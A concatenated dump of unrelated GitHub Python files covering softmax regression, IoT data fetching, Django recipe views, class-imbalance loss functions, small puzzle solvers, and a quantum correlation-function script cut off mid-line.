pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_rcv1\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn import datasets\n\nclass softmax_regression():\n def __init__(self,x_train,x_test,y_train,y_test,lr=0.01,epoches=200,batch_size=1):\n \"\"\"\n :param low_dim:lower dimension of A\n :param lr:learning rate\n :param epoches:the steps of trainning\n :param batch_size:size of a batch\n \"\"\"\n\n self.lr = lr\n self.x_train,self.x_test,self.y_train,self.y_test = x_train,x_test,y_train,y_test\n self.epoches = epoches\n self.batch_size = batch_size\n\n def shuffle_data(self,data):\n \"\"\"\n random shuffle the data\n :param data: [x,y]\n :return:\n \"\"\"\n n_sample = data[0].shape[0]\n index = np.random.permutation(n_sample)\n return [d[index] for d in data]\n\n def batch_generator(self,data,shuffle=True):\n \"\"\"\n yield batch of data\n :param data: [x,y]\n :return:\n \"\"\"\n batch_count = 0\n if shuffle:\n data = self.shuffle_data(data)\n while True:\n if batch_count * self.batch_size + self.batch_size > len(data[0]):\n batch_count = 0\n start = batch_count * self.batch_size\n end = batch_count * self.batch_size + self.batch_size\n batch_count += 1\n yield [d[start:end] for d in data]\n\n def train_on_batch(self,x,y):\n \"\"\"\n :param x:data,(n,d)\n :param y:label,(n,numclass)\n :return:\n \"\"\"\n (n, d) = x.shape\n (n,num_class) = y.shape\n x = np.column_stack((x, np.ones((n, 1))))#增加偏置项\n (n, d) = x.shape\n self.input_dim ,self.output_dim = d , num_class\n #随机初始化参数\n self.w = self.random_init((self.input_dim ,self.output_dim))\n X,Y = x,y\n step = 0\n batch_gen = self.batch_generator([X,Y])\n d, yi = 0, 0\n delta = 0\n test_loss_list = []\n test_acc_list = []\n grad_list = []\n train_loss_list = []\n test_error_list = []\n while(step < self.epoches):\n batch_x,batch_y = next(batch_gen)\n # print('batch',batch_x.shape,batch_y.shape)\n #随机产生Minibatch的样本\n x,y = batch_x,batch_y\n pred_y = np.dot(x, self.w)\n pred_y = self.softmax(pred_y)\n # print(pred_y,y)\n test_acc,test_loss = self.test(self.x_test,self.y_test)\n test_error = 1 - test_acc\n test_error_list.append(test_error)\n train_acc, train_loss = self.test(self.x_train, self.y_train)\n test_loss_list.append(test_loss)\n train_loss_list.append(train_loss)\n test_acc_list.append(test_acc)\n loss = self.softmax_loss(pred_y, y)\n print('loss:',loss)\n #计算softmax 回归的梯度\n grads = np.dot(x.T,(pred_y - y))/self.batch_size\n delta = np.linalg.norm(grads)\n grad_list.append(delta)\n print('梯度范数为:',delta)\n d = d - yi + grads\n yi = grads\n #梯度更新\n self.w -= self.lr * d\n step += 1\n self.test_loss_list = test_loss_list\n self.test_acc_list = test_acc_list\n self.grad_list = grad_list\n self.train_loss_list = train_loss_list\n self.test_error_list = test_error_list\n\n def plot_loss(self,loss_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters,loss_list)\n plt.title('loss in test',fontsize=24)\n plt.xlabel('iter',fontsize=4)\n plt.ylabel('loss',fontsize=4)\n plt.show()\n\n def plot_test_loss(self, loss_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters, loss_list)\n plt.title('loss in test', fontsize=24)\n plt.xlabel('iter', fontsize=4)\n plt.ylabel('loss', fontsize=4)\n plt.show()\n\n def plot_train_loss(self, loss_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters, loss_list)\n plt.title('loss in training', fontsize=24)\n plt.xlabel('iter', fontsize=4)\n plt.ylabel('loss', fontsize=4)\n plt.show()\n\n def plot_test_errors(self, error_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters, error_list)\n plt.title('errors in test', fontsize=24)\n plt.xlabel('iter', fontsize=4)\n plt.ylabel('error', fontsize=4)\n plt.show()\n\n def plot_accuracy(self):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters,self.test_acc_list)\n plt.title('accuracy in test',fontsize=24)\n plt.xlabel('iter',fontsize=4)\n plt.ylabel('accuracy',fontsize=4)\n plt.show()\n\n def plot_grad(self):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters,self.grad_list)\n plt.title('grad in training',fontsize=24)\n plt.xlabel('iter',fontsize=4)\n plt.ylabel('grad',fontsize=4)\n plt.show()\n\n def test(self,x,y):\n (n, d) = x.shape\n (n, num_class) = y.shape\n x = np.column_stack((x, np.ones((n, 1)))) # 增加偏置项\n pred_y = np.dot(x, self.w)\n pred_y = self.softmax(pred_y)\n test_loss = self.softmax_loss(pred_y, y)\n pred = pred_y.argmax(axis=1)\n y = y.argmax(axis=1)\n result = [pred[i] == y[i] for i in range(len(pred))]\n\n acc = sum(result)/len(result)\n\n return acc,test_loss\n\n def softmax(self,y):\n '''\n\n :param y: predicted y\n :return: softmax reuslts of predicetd y\n '''\n exp_pred = np.exp(y)\n exp_predsum = np.expand_dims(np.sum(exp_pred, axis=1),1)\n # print('exppredshape:',exp_pred.shape,exp_predsum.shape)\n pred = exp_pred / exp_predsum\n return pred\n\n def random_init(self,shape):\n n_features, num_class = shape\n limit = np.sqrt(1/n_features)\n W = np.random.uniform(-limit,limit,shape)\n return W\n\n def softmax_loss(self,pred,label):\n '''\n calculate the loss between pred and label\n :param pred:predicted y (n,numclasses)\n :param label:(n,numclasses)\n :return:softmax loss between pred_y and labels\n '''\n print('labelshape',label.shape,pred.shape)\n return -np.mean(np.sum((np.log(pred) * label),axis=1))\n\nif __name__ == \"__main__\":\n data_path = \"../covtype.data\"\n data = pd.read_csv(data_path,header=None)\n qualitative_list = []\n # 统计零一变量的特征\n for i in range(54):\n # print(np.unique(data.iloc[:,i]))\n if len(np.unique(data.iloc[:,i])) == 2:\n qualitative_list.append(i)\n print(qualitative_list)\n\n X ,Y = np.array(data.iloc[:,:-1]),np.array(data.iloc[:,-1])\n Y = np.expand_dims(Y, 1)\n x_mean = np.mean(X[:,:10],axis=0)\n x_var = np.var(X[:,:10],axis=0)\n #对非零一变量特征进行标准化处理\n X[:,:10] = (X[:,:10] - x_mean)/x_var\n (n, d) = X.shape\n train_len = int(0.7 * n)\n index = [i for i in range(n)]\n np.random.seed(0)\n np.random.shuffle(index)\n enc = OneHotEncoder(sparse=False)\n Y = enc.fit_transform(Y)\n X,Y = X[index],Y[index]\n # 按照3:7的比例对数据集划分为训练集和测试集\n x_train,x_test,y_train,y_test = X[:train_len],X[train_len:],Y[:train_len],Y[train_len:]\n model = softmax_regression(x_train,x_test,y_train,y_test,lr=0.01,batch_size=1,epoches=1000)\n model.train_on_batch(x_train,y_train)\n acc,loss = model.test(x_test,y_test)\n model.plot_loss(model.test_loss_list)\n model.plot_accuracy()\n model.plot_train_loss(model.train_loss_list)\n model.plot_test_errors(model.test_error_list)\n\n\n # data = datasets.load_iris()\n # X = data['data']\n # Y = data['target']\n # x_mean = np.mean(X, axis=0)\n # x_var = np.var(X, axis=0)\n # X = (X - x_mean) / x_var\n # Y = np.expand_dims(Y,axis=1)\n # (n, d) = X.shape\n # train_len = int(0.7 * n)\n # index = [i for i in range(n)]\n # np.random.seed(0)\n # np.random.shuffle(index)\n # enc = OneHotEncoder(sparse=False)\n # Y = enc.fit_transform(Y)\n # print('shape',Y.shape)\n # X,Y = X[index],Y[index]\n # x_train,x_test,y_train,y_test = X[:train_len],X[train_len:],Y[:train_len],Y[train_len:]\n # print(y_train.shape)\n # model = softmax_regression(x_train,x_test,y_train,y_test,lr=0.01,batch_size=1,epoches=1000)\n # model.train_on_batch(x_train,y_train)\n # acc,loss = model.test(x_test,y_test)\n # print('accuracy:',acc)\n # model.plot_loss(model.test_loss_list)\n # model.plot_accuracy()\n # model.plot_grad()\n # print('shape:',X.shape,Y.shape)\n # rcv1 = fetch_rcv1()\n # print(rcv1.data.shape,rcv1.target.shape)\n # x = np.insert(X, 13, np.ones((n, )), axis=1)\n\n # Y = np.expand_dims(Y,1)\n # NCA_trainer = NCA(6,0.01,200,batch_size=10)\n # NCA_trainer.train_on_batch(X,Y)\n # transformed_x = NCA_trainer.transform(X)\n # print(transformed_x)\n # print(NCA_trainer.A)\n","repo_name":"liuruiqiang/Implementation-of-some-basical-optimization-algorithm-","sub_path":"SAG.py","file_name":"SAG.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15206672225","text":"import requests\nimport pandas as pd\n\n#devLoc = \"http://restapi.toysmythiot.com:8080/v1/DaeguDalseong/DeviceInfo\"\ndevOnOff = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceStatus\"\nfloatPopPerHour = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceCountHourly\"\nfloatPopPerDay = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceCountDay\"\nrevisitPerDay = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceCountRevisit\"\nsenseDataPerHour = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/SensorDataHourly\"\nresidenceTime = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceResidenceTime\"\n#pdf 문서에서 복사해서 하면 안됨.\ncountMonth = \"http://restapi.toysmythiot.com/v1/BuanSmartTown/DeviceCountMonthly\"\n\ndef creatData():\n response = requests.get(devOnOff)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/devOnOff.csv\", encoding='utf-8-sig')\n\n response = requests.get(floatPopPerHour)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/floatPopPerHour.csv\", encoding='utf-8-sig')\n\n response = requests.get(floatPopPerDay)\n data = response.json()\n df = pd.DataFrame(data)\n #df.to_csv(\"../data/floatPopPerDay.csv\", encoding='euc-kr',mode='a')\n df.to_csv(\"../data/floatPopPerDay.csv\", encoding='utf-8-sig')\n\n response = requests.get(revisitPerDay)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/revisitPerDay.csv\", encoding='utf-8-sig')\n\n response = requests.get(senseDataPerHour)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/senseDataPerHour.csv\", encoding='utf-8-sig',index = False)\n\n response = requests.get(residenceTime)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/residenceTime.csv\", encoding='utf-8-sig')\n\n response = requests.get(countMonth)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/countMonth.csv\", encoding='utf-8-sig')\n\n\nif __name__ == \"__main__\":\n creatData()","repo_name":"hancom507/dash","sub_path":"dash/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70123587208","text":"def combinationSum(candidates, target: int):\n ret = []\n def miniSearch(cans, combine, tar):\n if tar==0:\n if combine not in ret:\n ret.append(combine)\n return\n elif tar<0:\n return \n else:\n for i, c in enumerate(cans):\n miniSearch(cans[i:], combine+[c], tar - c)\n \n miniSearch(candidates, [], target) \n return ret\n\nfor c, t in zip([[2,3,6,7],[2,3,5],[2]],[7,8,1]):\n a = combinationSum(c, t)\n print(a)\n\n","repo_name":"jammyWolf/algorithm","sub_path":"lc/hot100/39.数组总和.py","file_name":"39.数组总和.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73250257928","text":"from django.contrib import messages\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import Ricette, Preferiti, Categoria\nfrom .forms import RicettaForm\n\n\n\n\ndef homePageView(request):\n categorie = Categoria.objects.all()\n contesto = {'categorie': categorie}\n return render(request, 'ricette/home.html', contesto)\n\ndef signin(request):\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n form.add_error(None, \"Invalid username or password\")\n\n else:\n form = AuthenticationForm()\n\n return render(request, 'ricette/login.html', {'form': form})\n\ndef signout(request):\n logout(request)\n return redirect('home')\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user=form.save()\n login(request, user)\n return redirect('home')\n else:\n form = UserCreationForm()\n return render(request, 'ricette/register.html', {'form': form})\n\n\n\ndef ricette(request, id_ricetta):\n ricetta = Ricette.objects.get(id=id_ricetta)\n return render(request, 'ricette/ricette.html', {'ricetta': ricetta})\n\n@login_required(login_url='/login/')\ndef crea_ricetta(request):\n if request.method == 'POST':\n form = RicettaForm(request.POST)\n if form.is_valid():\n ricetta = form.save(commit=False)\n ricetta.save()\n return redirect('home') # Redirigi l'utente alla home dopo aver creato la ricetta\n else:\n form = RicettaForm()\n return render(request, 'ricette/crea_ricetta.html', {'form': form})\n\ndef lista_ricette(request):\n ricette = Ricette.objects.all()\n categoria=request.GET.get('categoria')\n if categoria:\n ricette=ricette.filter(categoria__nome=categoria)\n contesto = {'ricette': ricette,\n 'categorie': Categoria.objects.all(),\n 'categoria_selezionata': categoria if categoria else 'Tutte le ricette'}\n return render(request, 'ricette/lista_ricette.html', contesto)\n\n@login_required(login_url='/login/')\ndef preferiti(request):\n preferiti = Preferiti.objects.get(user=request.user)\n if preferiti.lista.count()==0:\n messages.info(request, \"Non hai ancora aggiunto ricette ai preferiti\")\n return redirect('home')\n return render(request, 'ricette/preferiti.html', {'preferiti': preferiti})\n\n@login_required(login_url='/login/')\ndef aggiungi_preferiti(request, id_ricetta):\n if request.method == 'POST':\n ricetta = Ricette.objects.get(id=id_ricetta)\n preferiti, crea_ricetta = Preferiti.objects.get_or_create(user=request.user)\n preferiti.lista.add(ricetta)\n preferiti.save()\n return redirect('preferiti')\n else:\n return redirect('home')\n\n@login_required(login_url='/login/')\ndef rimuovi_preferiti(request, id_ricetta):\n if request.method == 'POST':\n ricetta = Ricette.objects.get(id=id_ricetta)\n preferiti = Preferiti.objects.get(user=request.user)\n preferiti.lista.remove(ricetta)\n return redirect('preferiti')\n else:\n return redirect('home')\n\n\ndef idee_ricette(request):\n return render(request, 'ricette/idee_ricette.html')\n\ndef antipasti(request):\n return render(request, 'ricette/antipasti.html')\n\ndef primi(request):\n return render(request, 'ricette/primi.html')\n\ndef secondi(request):\n return render(request, 'ricette/secondi.html')\n\ndef dolci(request):\n return render(request, 'ricette/dolce.html')\n\ndef contorni(request):\n return render(request, 'ricette/contorni.html')\n\ndef intolleranti(request):\n return render(request, 'ricette/intolleranti.html')\n\n\n\n","repo_name":"laura0426/django_progettouni","sub_path":"ricette/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16160723765","text":"import math\nimport logging\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom utils.data_utils import get_per_cls_weights\n\n\ndef focal_loss(input_values, gamma):\n \"\"\"Computes the focal loss\"\"\"\n p = torch.exp(-input_values)\n loss = (1 - p) ** gamma * input_values\n return loss.mean()\n\nclass FocalLoss(nn.Module):\n def __init__(self, cls_num_list=None, gamma=0., imbalance_beta=0.9999, args=None):\n super(FocalLoss, self).__init__()\n assert gamma >= 0\n self.args = args\n self.gamma = gamma\n self.imbalance_beta = imbalance_beta\n if self.args.imbalance_loss_reweight:\n self.weight = get_per_cls_weights(cls_num_list, imbalance_beta)\n else:\n self.weight = None\n\n def update(self, **kwargs):\n if self.args.imbalance_loss_reweight:\n if \"cls_num_list\" in kwargs and kwargs[\"cls_num_list\"] is not None:\n if \"imbalance_beta\" in kwargs and kwargs[\"imbalance_beta\"] is not None:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], kwargs[\"imbalance_beta\"])\n else:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], self.imbalance_beta)\n else:\n pass\n else:\n logging.info(\"WARNING: the imbalance weight has not been updated.\")\n self.weight = None\n\n def forward(self, input, target):\n return focal_loss(F.cross_entropy(input, target, reduction='none', weight=self.weight), self.gamma)\n\nclass LDAMLoss(nn.Module):\n def __init__(self, cls_num_list=None, max_m=0.5, s=30, imbalance_beta=0.9999, args=None):\n super(LDAMLoss, self).__init__()\n self.args = args\n self.imbalance_beta = imbalance_beta\n m_list = 1.0 / np.sqrt(np.sqrt(cls_num_list))\n m_list = m_list * (max_m / np.max(m_list))\n # m_list = torch.cuda.FloatTensor(m_list)\n self.m_list = m_list\n self.max_m = max_m\n assert s > 0\n self.s = s\n if self.args.imbalance_loss_reweight:\n self.weight = get_per_cls_weights(cls_num_list, imbalance_beta)\n else:\n self.weight = None\n\n def update(self, **kwargs):\n if self.args.imbalance_loss_reweight:\n if \"cls_num_list\" in kwargs and kwargs[\"cls_num_list\"] is not None:\n if \"imbalance_beta\" in kwargs and kwargs[\"imbalance_beta\"] is not None:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], kwargs[\"imbalance_beta\"])\n else:\n self.weight = get_per_cls_weights(kwargs[\"cls_num_list\"], self.imbalance_beta)\n else:\n pass\n else:\n logging.info(\"WARNING: the imbalance weight has not been updated.\")\n self.weight = None\n\n if \"cls_num_list\" in kwargs and kwargs[\"cls_num_list\"] is not None:\n cls_num_list = kwargs[\"cls_num_list\"]\n m_list = 1.0 / np.sqrt(np.sqrt(cls_num_list))\n m_list = m_list * (self.max_m / np.max(m_list))\n # m_list = torch.cuda.FloatTensor(m_list)\n self.m_list = m_list\n else:\n pass\n\n def forward(self, x, target):\n index = torch.zeros_like(x, dtype=torch.uint8, device=x.device)\n index.scatter_(1, target.data.view(-1, 1), 1)\n index_float = index.type(torch.cuda.FloatTensor)\n self.m_list = torch.cuda.FloatTensor(self.m_list).to(device=x.device)\n batch_m = torch.matmul(self.m_list[None, :], index_float.transpose(0,1))\n batch_m = batch_m.view((-1, 1))\n x_m = x - batch_m\n output = torch.where(index, x_m, x)\n return F.cross_entropy(self.s*output, target, weight=self.weight)\n\n\n\n # def forward(self, x, target, m_list=None, weight=None):\n # index = torch.zeros_like(x, dtype=torch.uint8)\n # index.scatter_(1, target.data.view(-1, 1), 1)\n \n # index_float = index.type(torch.cuda.FloatTensor)\n # if m_list is not None:\n # batch_m = torch.matmul(m_list[None, :], index_float.transpose(0,1))\n # else:\n # batch_m = torch.matmul(self.m_list[None, :], index_float.transpose(0,1))\n\n # if weight is not None:\n # input_weight = weight\n # else:\n # input_weight = self.weight\n\n # batch_m = batch_m.view((-1, 1))\n # x_m = x - batch_m\n \n # output = torch.where(index, x_m, x)\n # return F.cross_entropy(self.s*output, target, weight=input_weight)\n\n\ndef linear_combination(x, y, epsilon): \n return epsilon*x + (1-epsilon)*y\n\ndef reduce_loss(loss, reduction='mean'): \n return loss.mean() if reduction=='mean' else loss.sum() if reduction=='sum' else loss \n\nclass LabelSmoothingCrossEntropy(nn.Module): \n def __init__(self, epsilon:float=0.1, reduction='mean'): \n super().__init__() \n self.epsilon = epsilon \n self.reduction = reduction \n\n def forward(self, preds, target): \n n = preds.size()[-1] \n log_preds = F.log_softmax(preds, dim=-1) \n loss = reduce_loss(-log_preds.sum(dim=-1), self.reduction) \n nll = F.nll_loss(log_preds, target, reduction=self.reduction) \n return linear_combination(loss/n, nll, self.epsilon)\n\n\n\n\n\n\n\ndef cross_pair_norm(src_labels, src_features, tgt_labels, tgt_features):\n norm = 0\n count = 0\n for i in range(len(src_labels)):\n for j in range(len(tgt_labels)):\n if src_labels[i] == tgt_labels[j]:\n count += 1\n norm += torch.linalg.norm(src_features[i] - tgt_features[j], ord=2, dim=0).sum()\n return norm / count\n\n\n\ndef pair_norm(labels, features):\n norm = 0\n count = 0\n for i in range(len(labels)):\n for j in range(i + 1, len(labels)):\n if labels[i] == labels[j]:\n count += 1\n norm += torch.linalg.norm(features[i] - features[j], ord=2, dim=0).sum()\n return norm / count\n","repo_name":"wizard1203/GossipFL","sub_path":"loss_fn/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"70251526728","text":"import numpy as np\nimport cv2 \n\nimg1 = cv2.imread('IMG_5760.JPG')\nimg2 = cv2.imread('IMG_5761.JPG')\nimg3 = cv2.imread('IMG_5762.JPG')\n\n#shrink images by a factor of 4\nimg1small = cv2.resize(img1, (0,0), fx = 0.25, fy = 0.25)\nimg2small = cv2.resize(img2, (0,0), fx = 0.25, fy = 0.25)\nimg3small = cv2.resize(img3, (0,0), fx = 0.25, fy = 0.25)\n\ncv2.imwrite('IMG_5760_2.JPG', img1small)\ncv2.imwrite('IMG_5761_2.JPG', img2small)\ncv2.imwrite('IMG_5762_2.JPG', img3small)\n","repo_name":"ThomasSwinicki/SDP","sub_path":"positive/p_forward/test/shrink.py","file_name":"shrink.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1920969355","text":"import os\nimport functools\n\n# input_file = open(os.path.join(os.path.dirname(__file__), './test_input.txt'))\ninput_file = open(os.path.join(os.path.dirname(__file__), './input.txt'))\nlines = list(map(lambda l: list(l.replace('\\n', '')), input_file)) # double array\n\n\ndef solve(lines, x, y, step_x, step_y, treeHitCount):\n if lines[y][x%len(lines[0])] == '#':\n treeHitCount += 1\n\n x += step_x\n y += step_y\n\n if y >= len(lines):\n return treeHitCount\n else:\n return solve(lines, x, y, step_x, step_y, treeHitCount)\n\n\nprint('Solution 1:', solve(lines, 0, 0, 3, 1, 0))\n\nprint('Solution 2:', functools.reduce(\n lambda a, b: a * b, \n [\n solve(lines, 0, 0, 1, 1, 0),\n solve(lines, 0, 0, 3, 1, 0),\n solve(lines, 0, 0, 5, 1, 0),\n solve(lines, 0, 0, 7, 1, 0),\n solve(lines, 0, 0, 1, 2, 0)\n ]\n))\n","repo_name":"elonmallin/advent-of-code-2020","sub_path":"day03/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26492685677","text":"a=int(input(\"Enter The Number:\"))\r\nb=0\r\nfor i in range(2,a):\r\n if(a%i==0):\r\n b+=1\r\n break\r\nif(b==0):\r\n print(\"Number Is Prime Number\")\r\nelse:\r\n print(\"It Is Not A Prime Number\")","repo_name":"Abhishek01210/IBM-Projects","sub_path":"Prime Number.py","file_name":"Prime Number.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4388374642","text":"###=============================================================###\n### Exact evaluation of KT and DKT correlations for simple\t###\n### Hamiltonians using Gauss-Hermite (i.e. HO) basis sets.\t###\n### The 2D TCF computed are:\t\t\t\t\t\t\t\t\t###\n### 1a) DKT correlation <A;B(t1);C(t2)>\t\t\t\t\t\t###\n### 1b) DKT correlation <dot(A);dot(B)(t1);C(t2)>\t\t\t\t\t\t###\n### 2) standard TCF <AB(t1)C(t2)>\t\t\t\t\t\t\t\t###\n### 3) standard TCF <B(t1)C(t2)A>\t\t\t\t\t\t\t\t###\n### 4) standard TCF <C(t2)AB(t1)>\t\t\t\t\t\t\t\t###\n### 5) standard TCF <AC(t2)B(t1)>\t\t\t\t\t\t\t\t###\n### 6) standard TCF <C(t2)B(t1)A>\t\t\t\t\t\t\t\t###\n### 7) standard TCF <B(t1)AC(t2)>\t\t\t\t\t\t\t\t###\n### The 1D TCF computed are:\t\t\t\t\t\t\t\t\t###\n### 1) KT correlation <A;B(t1)>\t\t\t\t\t\t\t\t###\n###=============================================================###\nhbar=1.0\nimport sys\nimport numpy as np\nimport scipy.linalg as linn\nimport time as get_time\nonly_freq =True\nonly_freq =False\ncompute_DKT=True\ncompute_PB=True\ncompute_std=True\nt_init=get_time.time()\n###================================================================\n### read some parameters from command line\n\n### usage\nif(len(sys.argv)<=2):\n\tprint('Usage: python {} potential beta A B C (cubic coef)'.format(sys.argv[0]))\n\tprint('Potential should be \"HO\" or \"WAP\" or \"QP\" or \"WQP\" or \"OHqtip4pf\" or \"QPper\" or \"Chaos\" ')\n\tprint('A,B,C should be x or x2')\n\tsys.exit() \n### potential\npotential=sys.argv[1]\nif(potential!='HO' and potential!='WAP' and potential!='QP' and potential!='WQP' and potential!='OHqtip4pf' and potential!='QPper' and potential!='Chaos'):\n\tsys.exit('potential \"{}\" not defined. potential should be \"HO\" or \"WAP\" or \"QP\" or \"WQP\" or \"OHqtip4pf\" or \"QPper\" or \"Chaos\" '.format(potential))\nprint('potential = ',potential)\n\nif(len(sys.argv)!=6 and len(sys.argv)!=7):\n\tsys.exit('Usage: python {} potential beta A B C (cubic coef)'.format(sys.argv[0]))\n\n\n### beta: length of the imaginary timestep (au)\nbeta=float(sys.argv[2])\nprint('beta = ',beta)\n\n### observables\nA_obs = sys.argv[3]\nB_obs = sys.argv[4]\nC_obs = sys.argv[5]\n\nif(A_obs!='x' and A_obs!='x2' and B_obs!='x' and B_obs!='x2' and C_obs!='x' and C_obs!='x2'):\n\tsys.exit('observable not defined. observable should be \"x\" or \"x2\"')\nprint('A = ',A_obs)\nprint('B = ',B_obs)\nprint('C = ',C_obs)\n\n###================================================================\n\n###================================================================\n### define some parameters of the simulation\n\ndt = .5\t\t\t# time step (au)\nnstep = 100\t# number of time step\n#nstep = 200\t# number of time step\n\n\n#Standard yair\nnb = 200\t\t# number of basis functions to use\ntnb = 16\t\t# truncated basis set \n\n#Tighter 1\n#nb = 400\t\t# number of basis functions to use\n#tnb = 16\t\t# truncated basis set \n\n#Tighter 2\n#nb = 400\t\t# number of basis functions to use\n#tnb = 32\t\t# truncated basis set \n\nprint('Simulation parameters')\nprint('dt = ',dt)\nprint('nstep = ',nstep)\nprint('nb/tnb = ',nb,tnb)\n\n###================================================================\n\n###================================================================\n### define some parameters of the Hamiltonian\n### Note: using m=omega=1\n### H = p^2/2 + a*x^2 + b*x^3 + c*x^4\n\nif(potential=='HO'):\n\t### Harmonic Oscillator\n\ta = 0.5\n\tb = 0.\n\tc = 0.\n\tmass=1.0\nelif(potential=='WAP'):\n\t### Weakly Anharmonic Potential\n\ta = 0.5\n\tb = 0.1\n\tc = 0.01\n\tmass=1.0\nelif(potential=='QPper'):\n\t### Weakly Cubic Potential\n\ta = 0.5\n\tb = 0.0\n\ttry:\n\t c= float(sys.argv[6])\n\t print('Cuartic coefficient is : {}\\n'.format(c))\n\texcept:\n\t raise ValueError('Please specify cuartic coefficient\\n\\n')\n\tmass=1.0\nelif(potential=='QP'):\n\t### Quartic Potential\n\ta = 0.\n\tb = 0.\n\tc = 0.25\n\tmass=1.0\nelif(potential=='OHqtip4pf'):\n\t### OH stretch from qtip4pf\n\talpha=1.21\n\ta = 0.5\n\tb = -alpha*0.5 #-0.6\n\tc = +7./24. *(alpha)**2 #+0.42\n\tmass=1.0\nelif(potential=='WQP'):\n\t### Weakly Cubic Potential\n\ta = 0.5\n\ttry:\n\t b= float(sys.argv[6])\n\t print('Cubic coefficient is : {}\\n'.format(b))\n\texcept:\n\t raise ValueError('Please specify cubic coefficient\\n\\n')\n\tc = b**2\n\tmass=1.0\nelif(potential=='Chaos'):\n\t### DW Potential\n\tmass = 0.5\n\tg = 0.08\n\twb = 2.0\n\n\ta = g * ( -2.0*(-mass*wb**2) / (4*g) )\n\tb = 0.0\n\tc = g**2\n\nprint('Potential parameters = ',a,b,c)\nprint('mass =',mass)\n\n###================================================================\n\n###================================================================\n### define time grid \n\ntime = np.zeros(nstep)\nfor i in range(nstep):\n\ttime[i] = i*dt - nstep*dt/2. #ALBERTO (negative and positive times)\n\t#time[i] = i*dt # only positive times \n###================================================================\n\n###================================================================\n### construct the Hamiltonians in the Gauss-Hermite basis\n\nprint('Start Hamiltonian construction')\n\n### x matrix\nx_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+1):\n\t\t\tx_mtrx[i,j] = np.sqrt(j+1)\n\t\tif i == (j-1):\n\t\t\tx_mtrx[i,j] = np.sqrt(j)\nx_mtrx *= (2.*mass)**(-0.5) \n\n### x^2 matrix\nx2_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+2):\n\t\t\tx2_mtrx[i,j] = np.sqrt((j+1)*(j+2))\n\t\tif i == j:\n\t\t\tx2_mtrx[i,j] = 2*j+1\n\t\tif i == (j-2):\n\t\t\tx2_mtrx[i,j] = np.sqrt(j*(j-1))\nx2_mtrx *= (2.0*mass)**(-1.)\n\n### p^2 matrix\np2_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+2):\n\t\t\tp2_mtrx[i,j] = -np.sqrt((j+1)*(j+2))\n\t\tif i == j:\n\t\t\tp2_mtrx[i,j] = 2*j+1\n\t\tif i == (j-2):\n\t\t\tp2_mtrx[i,j] = -np.sqrt(j*(j-1))\np2_mtrx *= (mass/2.0)\n\n### x^3 matrix\nx3_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+3):\n\t\t\tx3_mtrx[i,j] = np.sqrt((j+1)*(j+2)*(j+3))\n\t\tif i == (j+1):\n\t\t\tx3_mtrx[i,j] = j*np.sqrt(j+1) + (j+1)**(1.5) + (j+2)*np.sqrt(j+1)\n\t\tif i == (j-1):\n\t\t\tx3_mtrx[i,j] = (j-1)*np.sqrt(j) + j**(1.5) 